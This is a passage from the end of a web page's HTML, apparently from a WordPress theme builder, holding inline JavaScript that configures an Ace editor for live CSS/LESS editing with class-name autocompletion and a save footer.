									var editor_textarea = jQuery('.td_live_css_uid_1_5ec841e0d391a');
									var languageTools = ace.require("ace/ext/language_tools");
									var tdcCompleter = {
										getCompletions: function (editor, session, pos, prefix, callback) {
											if (prefix.length === 0) {
												callback(null, []);
												return
											}

											if ('undefined' !== typeof tdcAdminIFrameUI) {

												var data = {
													error: undefined,
													getShortcode: ''
												};

												tdcIFrameData.getShortcodeFromData(data);

												if (!_.isUndefined(data.error)) {
													tdcDebug.log(data.error);
												}

												if (!_.isUndefined(data.getShortcode)) {

													var regex = /el_class=\"([A-Za-z0-9_-]*\s*)+\"/g,
														results = data.getShortcode.match(regex);

													var elClasses = {};

													for (var i = 0; i < results.length; i++) {
														var currentClasses = results[i]
															.replace('el_class="', '')
															.replace('"', '')
															.split(' ');

														for (var j = 0; j < currentClasses.length; j++) {
															if (_.isUndefined(elClasses[currentClasses[j]])) {
																elClasses[currentClasses[j]] = '';
															}
														}
													}

													var arrElClasses = [];

													for (var prop in elClasses) {
														arrElClasses.push(prop);
													}

													callback(null, arrElClasses.map(function (item) {
														return {
															name: item,
															value: item,
															meta: 'in_page'
														}
													}));
												}
											}
										}
									};
									languageTools.addCompleter(tdcCompleter);

									window.editor = ace.edit("td_live_css_uid_1_5ec841e0d391a");

									// 'change' handler is written as function because it's called by tdc_on_add_css_live_components (of wp_footer hook)
									// We did it to reattach the existing compiled css to the new content received from server.
									window.editorChangeHandler = function () {
										//tdwState.lessWasEdited = true;

										window.onbeforeunload = function () {
											if (tdwState.lessWasEdited) {
												return "You have attempted to leave this page. Are you sure?";
											}
											return false;
										};

										var editorValue = editor.getSession().getValue();

										editor_textarea.val(editorValue);

										if ('undefined' !== typeof tdcAdminIFrameUI) {
											tdcAdminIFrameUI.getLiveIframe().contents().find('.tdw-css-writer-editor:first').val(editorValue);

											// Mark the content as modified
											// This is important for showing info when composer closes
                                            tdcMain.setContentModified();
										}

										tdLiveCssInject.less();
									};

									editor.getSession().setValue(editor_textarea.val());
									editor.getSession().on('change', editorChangeHandler);

									editor.setTheme("ace/theme/textmate");
									editor.setShowPrintMargin(false);
									editor.getSession().setMode("ace/mode/less");
									editor.setOptions({
										enableBasicAutocompletion: true,
										enableSnippets: true,
										enableLiveAutocompletion: false
									});

								}

							});
						</script>

					</div>
				</div>

				<footer>

					
						<a href="#" class="tdw-save-css">Save</a>
						<div class="tdw-more-info-text">Write CSS OR LESS and hit save. CTRL + SPACE for auto-complete.</div>

					
					<div class="tdw-resize"></div>
				</footer>
			</div>
			
</body>
</html>